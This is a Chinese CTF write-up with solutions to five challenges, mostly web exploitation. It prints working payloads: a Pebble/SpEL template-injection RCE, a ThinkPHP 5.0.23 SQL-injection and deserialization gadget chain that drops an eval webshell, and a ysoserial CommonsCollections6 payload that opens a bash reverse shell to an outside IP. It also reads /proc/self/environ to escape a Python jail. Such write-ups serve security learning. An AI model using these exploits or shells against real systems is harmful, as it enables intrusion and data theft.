27 htppy Spring
评价: 相对简单,放出来的晚,做的出来的人相对比较少
大致流程是可以上传.pebble模板文件,然后通过访问上传的恶意模板文件进行rce。
首先上传恶意模板文件,经过几次尝试,黑名单过滤了,org.springframework.context.support.ClassPathXmlApplicationContext和{{
最终.pebble文件内容为
content=666{%25+set+clazz%3dbeans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").getResourceLoader().getClassLoader().loadClass("org.springframework.expression.spel.standard.SpelExpressionParser")+%25}{%25+set+instance+%3d++beans.get("jacksonObjectMapper").readValue("{}",+clazz)+%25}{%25+set+a+%3d+instance.parseExpression("new+java.lang.ProcessBuilder(\"bash\",+\"-c\",+\"cat+/flag>/tmp/777.pebble\").start()").getValue()%25}888
参考https://www.cnblogs.com/kingbridge/articles/16592408.html
注意返回的时间,下一步访问模板文件时会用到
返回666888说明中间的模板成功执行了,然后访问777即可得到flag
flag值
flag{862ce055-ec20-4907-b7d0-7fa24197ded1}
29 thinkshop
评价:大部分都还好,就是附件不想给就别给算了。
大致流程是: 后台登录,sql注入造成反序列化(thinkphp5.0.23存在反序列化漏洞,本题5.0.23rce的洞已经修复了)
从附件中得到几个有用是shop.sql、sql.sql、goods.sql、以及项目源码。
从源码中可以看到有后台,登录后台时,username会强转为int型,而执行的sql操作是
而数据库中的信息是
故,可以用 username=1&password=123456来登录后台.
对商品进行编辑的逻辑中,传入的是整个post数组
最终会传递给updaedata方法,由于data可控,key是可控的,sql语句拼接时,也没有进行处理,故此处可进行sql注入。
goods.html这里给了反序列化的口子
正常来说只需要将序列化值base64之后,通过sql插入即可。但有两个限制条件
- 第一个是base64后数据是
YTo,也就是a:
- 第二个反序列化触发的时机是都程序都执行完后,但这里反序列化后的对象传入了
arrayTohtml,由于后面操作类型不符合导致直接报错,无法触发反序列化。
综上,可利用php的垃圾回收机制 将要序列化的对象放入数组的第一个值的位置(key为0),然后再随便填一个值(key为1),序列化后,将将第二个key从1改为0,即可直接触发反序列化。
exp如下
<?php
namespace think\cache\driver {
class File
{
protected $options = [
'expire' => 0,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=',
'data_compress' => false,
];
protected $tag = "flag";
public function __construct()
{
echo "后门文件名称为" . "aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=" . md5("tag_" . md5($this->tag)) . ".php" . "\n\n\n";
}
}
}
namespace think\session\driver {
use SessionHandler;
use think\cache\driver\File;
class Memcache extends SessionHandler
{
protected $handler = null;
public function __construct()
{
$this->handler = new File();
}
}
}
namespace think\console {
use think\session\driver\Memcache;
class Output
{
private $verbosity = 1;
private $handle;
const OUTPUT_NORMAL = 1;
protected $styles = [
'getAttr'
];
public function __construct()
{
$this->verbosity = 1;
$this->handle = new Memcache();
}
}
}
namespace think\db {
use think\console\Output;
class Query
{
protected $model;
public function __construct()
{
$this->model = new output();
}
}
}
namespace think\model\relation {
use think\db\Query;
class HasOne
{
protected $selfRelation;
protected $query;
protected $bindAttr = [];
public function __construct()
{
$this->selfRelation = 0;
$this->query = new Query();
$attr = 'flag';
$this->bindAttr['flag'] = $attr;
}
}
}
namespace think {
abstract class Model
{
}
}
namespace think\model {
use think\model\relation\HasOne;
use think\console\Output;
use think\Model;
class Pivot extends Model
{
protected $data = [];
protected $append = [];
protected $error;
public $parent;
public function __construct()
{
$this->error = new HasOne();
$this->parent = new output();
$name = 'getError';
$this->append[] = $name;
}
}
}
namespace think\process\pipes {
use think\model\Pivot;
class Windows
{
private $files = [];
public function __construct()
{
$this->files[0] = new Pivot();
}
// var_dump
}
$a = array(0 => new Windows(), 1 => "6");
$c = urldecode("a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bi%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A3%3A%7Bs%3A31%3A%22%00think%5Cconsole%5COutput%00verbosity%22%3Bi%3A1%3Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A29%3A%22think%5Csession%5Cdriver%5CMemcache%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A117%3A%22php%3A%2F%2Ffilter%2Fconvert.iconv.utf-8.utf-7%7Cconvert.base64-decode%2Fresource%3DaaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4%3D%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22flag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A6%3A%22parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A3%3A%7Bs%3A31%3A%22%00think%5Cconsole%5COutput%00verbosity%22%3Bi%3A1%3Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A29%3A%22think%5Csession%5Cdriver%5CMemcache%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A117%3A%22php%3A%2F%2Ffilter%2Fconvert.iconv.utf-8.utf-7%7Cconvert.base64-decode%2Fresource%3DaaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4%3D%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bs%3A4%3A%22flag%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7Di%3A1%3Bs%3A0%3A%226%22%3B%7D");
echo bin2hex(base64_encode($c));
}
最终构造的数据包如下
POST /public/index.php/index/admin/do_edit.html HTTP/1.1
Host: eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 426
Origin: http://eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zef9lbnpjl0n8we7yhu.cloudeci1.ichunqiu.com/public/index.php/index/admin/goods_edit/id/1.html
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1701612145,1701926910,1702102270,1702619199; PHPSESSID=qq8ks874l951ucqk29tnrj14h5
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
id=1&name=aaaa&price=111111.00&on_sale_time=2023-01-01T15%3A16&image`%3dunhex('61'),`data`%3dunhex('59546f794f6e74704f6a4137547a6f794e7a6f6964476870626d746363484a765932567a633178776158426c633178586157356b6233647a496a6f784f6e747a4f6a4d304f69494164476870626d746363484a765932567a633178776158426c633178586157356b6233647a41475a706247567a496a74684f6a453665326b364d4474504f6a45334f694a3061476c75613178746232526c6246785161585a76644349364e447037637a6f334f6949414b67426b59585268496a74684f6a41366533317a4f6a6b364967417141474677634756755a43493759546f784f6e74704f6a4137637a6f344f694a6e5a585246636e4a766369493766584d364f446f6941436f415a584a79623349694f3038364d6a6336496e526f61573572584731765a47567358484a6c624746306157397558456868633039755a5349364d7a7037637a6f784e546f6941436f41633256735a6c4a6c6247463061573975496a74704f6a4137637a6f344f6949414b6742786457567965534937547a6f784e446f6964476870626d74635a474a635558566c636e6b694f6a453665334d364f446f6941436f416257396b5a5777694f3038364d6a4136496e526f6157357258474e76626e4e76624756635433563063485630496a6f7a4f6e747a4f6a4d784f69494164476870626d746359323975633239735a5678506458527764585141646d5679596d397a61585235496a74704f6a4537637a6f794f446f694148526f6157357258474e76626e4e7662475663543356306348563041476868626d52735a534937547a6f794f546f6964476870626d74636332567a63326c76626c786b636d6c325a584a63545756745932466a614755694f6a453665334d364d5441364967417141476868626d52735a5849694f3038364d6a4d36496e526f6157357258474e685932686c5847527961585a6c636c78476157786c496a6f794f6e747a4f6a45774f6949414b674276634852706232357a496a74684f6a553665334d364e6a6f695a58687761584a6c496a74704f6a4137637a6f784d6a6f695932466a61475666633356695a476c79496a74694f6a4137637a6f324f694a77636d566d615867694f334d364d446f69496a747a4f6a5136496e4268644767694f334d364d5445334f694a77614841364c79396d615778305a58497659323975646d5679644335705932397564693531644759744f433531644759744e33786a623235325a584a304c6d4a68633255324e43316b5a574e765a475576636d567a623356795932553959574668554551344f567059576d6869513264725744464355465578556d4a4b656b567557464e724e324e4861486468567a5674596e6c6e634642364e4430694f334d364d544d36496d5268644746665932397463484a6c63334d694f3249364d447439637a6f324f6949414b674230595763694f334d364e446f695a6d78685a7949376658317a4f6a6b364967417141484e306557786c6379493759546f784f6e74704f6a4137637a6f334f694a6e5a58524264485279496a74396658317a4f6a45784f6949414b6742696157356b515852306369493759546f784f6e747a4f6a5136496d5a73595763694f334d364e446f695a6d78685a7949376658317a4f6a5936496e4268636d567564434937547a6f794d446f6964476870626d746359323975633239735a56785064585277645851694f6a4d3665334d364d7a45364967423061476c756131786a6232357a6232786c5845393164484231644142325a584a6962334e7064486b694f326b364d54747a4f6a49344f69494164476870626d746359323975633239735a5678506458527764585141614746755a47786c496a74504f6a49354f694a3061476c756131787a5a584e7a615739755847527961585a6c636c784e5a57316a59574e6f5a5349364d547037637a6f784d446f6941436f41614746755a47786c63694937547a6f794d7a6f6964476870626d74635932466a614756635a484a70646d567958455a70624755694f6a493665334d364d544136496741714147397764476c76626e4d694f3245364e547037637a6f324f694a6c65484270636d55694f326b364d44747a4f6a45794f694a6a59574e6f5a56397a64574a6b615849694f3249364d44747a4f6a5936496e42795a575a7065434937637a6f774f6949694f334d364e446f696347463061434937637a6f784d546336496e426f63446f764c325a706248526c6369396a623235325a584a304c6d6c6a623235324c6e56305a6930344c6e56305a69303366474e76626e5a6c636e5175596d467a5a5459304c57526c5932396b5a5339795a584e7664584a6a5a5431685957465152446735576c686161474a445a3274594d554a5156544653596b703652573559553273335930646f643246584e5731696557647755486f3050534937637a6f784d7a6f695a4746305956396a62323177636d567a63794937596a6f774f33317a4f6a593649674171414852685a794937637a6f304f694a6d6247466e496a743966584d364f546f6941436f41633352356247567a496a74684f6a453665326b364d44747a4f6a6336496d646c64454630644849694f3331396658313961546f784f334d364d446f694e69493766513d3d')/**/WHERE/**/`id`%3d1#=&data=
更新后,去前台访问一下,然后
访问/public/aaaPD89ZXZhbCgkX1BPU1RbJzEnXSk7cGhwaW5mbygpPz4=09621a5f4361062ae732f5ed9c5764c0.php即可
flag值
flag{c7262541-e441-43a4-a35a-8d21966039ac}
36 happygame
web题怎么还要nc呢?
根据报错信息百度一下,可以发现是grpc
题目给的是个grpc的服务端,我们需要使用客户端通过特定的协议来连接才行。
使用grpcui连接
给了serializeData,那说明是让打反序列化的。经过尝试,使用java的cc6打通了。
java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvNDMuMTQyLjE1LjEwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}" > 1.class
最终payload
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGViYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtTDJSbGRpOTBZM0F2TkRNdU1UUXlMakUxTGpFd0x6VTFOVFVnTUQ0bU1RPT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfXQABGV4ZWN1cQB+ABsAAAABcQB+ACBzcQB+AA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4xxxxxxxxxx rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGViYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtTDJSbGRpOTBZM0F2TkRNdU1UUXlMakUxTGpFd0x6VTFOVFVnTUQ0bU1RPT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfXQABGV4ZWN1cQB+ABsAAAABcQB+ACBzcQB+AA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AF17ZWNobyxMMkpwYmk5aVlYTm9JQzFwSUQ0bUwyUmxkaTkwWTNBdk5ETXVNVFF5TGpFMUxqRXdMelUxTlRVZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==
flag值
flag{088ca719-e003-441b-9a0e-c916134c4add}
38 谍影重重2.0
监听飞机的飞行状态,其实监听的是ADS-B消息,具体可参考 https://zhuanlan.zhihu.com/p/646365846?utm_id=0
首先使用wireshark导出为json格式.然后用python进行处理。
在用pyModes求速度时,会报错,不知如何解决,但发现可以直接用pyModes.decoder.adsb.icao来获得icao码,发现只有7个,索性直接一个一个尝试,最后得到正确的flag
from pyModeS import decoder
import json,hashlib
print(["flag{"+hashlib.md5(icao.encode()).hexdigest()+"}" for icao in set([decoder.adsb.icao(p) for p in list(filter(lambda x :x is not None,[t['_source']['layers']['tcp']['tcp.payload'].replace(":","")[18:] if "tcp.payload" in t['_source']['layers']['tcp'] else None for t in json.load(open('adsb.json',encoding="utf-8")) ]))])])
脚本主要就是提取了tcp.payload字段的值,获取有用消息,然后交给decoder.adsb.icao得到icao码,并计算flag的值
flag值
flag{4cf6729b9bc05686a79c1620b0b1967b}
41 Pyjail ! It's myFILTER !!!
这题非预期,直接 open读环境变量就行
{print(open("/proc/self/environ").read())}
flag值
flag{c64da498-7a39-49cb-b8ed-fd840134f78d}